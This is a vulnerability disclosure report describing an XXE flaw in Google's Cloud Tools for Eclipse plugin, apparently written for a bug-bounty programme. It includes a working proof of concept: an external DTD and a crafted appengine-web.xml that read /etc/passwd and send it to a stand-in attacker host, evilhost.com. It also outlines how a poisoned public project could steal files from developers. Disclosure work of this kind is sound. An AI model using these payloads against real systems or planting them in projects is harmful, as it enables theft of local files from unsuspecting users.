Summary:
XXE vulnerability in the "Cloud Tools for Eclipse" IDE Plugin
Product:
Google Cloud
URL:
https://github.com/GoogleCloudPlatform/google-cloud-eclipse/
Vulnerability type:
XML eXternal Entity (XXE)
Details
The plugin is vulnerable to XXE via insecure parsing of the appengine-web.xml file. The vulnerability can be demonstrated as follows:
In Eclipse, install the Cloud Tools Plugin as described
here
Create a starter appengine project in Eclipse following steps
Create and host a DTD file "evil.dtd" with the following content (change the URL to one you control) :
<!ENTITY % all "<!ENTITY send SYSTEM 'http://evilhost.com/?collect=%file;'>
"> %all;
Open the project's appengine-web.xml file and replace the content with the following (replace the URL with the one you're using to host evil.dtd above):
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data [ <!ENTITY % file "file:///etc/passwd"> <!ENTITY % dtd SYSTEM "http://evilhost.com/evil.dtd">%dtd; ]>
<appengine-web-app xmlns="http://appengine.google.com/ns/1.0">
<threadsafe>true</threadsafe>
<sessions-enabled>false</sessions-enabled>
<runtime>java8</runtime>
<system-properties>
<property name="java.util.logging.config.file" value="WEB-INF/logging.properties"/>
</system-properties>
</appengine-web-app>
Depending on the permissions granted to the Eclipse user, the contents of the /etc/passwd file will be transmitted to the remote server.
The vulnerable code can be found in the following snippets:
https://github.com/GoogleCloudPlatform/google-cloud-eclipse/blob/4d213f59421f7d28aab17e336a248713fc97f1fa/plugins/com.google.cloud.tools.eclipse.appengine.standard.java8/src/com/google/cloud/tools/eclipse/appengine/standard/java8/AppEngineStandardJre8ProjectFacetDetector.java#L69-L77
Attack scenario
An attacker would create an appengine project with a maliciously crafted appengine-web.xml file and host it on a public repository. An unsuspecting user would open the project in Eclipse and upon opening the appengine-web.xml file would trigger the attack that would harvest sensitive local files from the user's machine and exfiltrate them to the attacker's servers.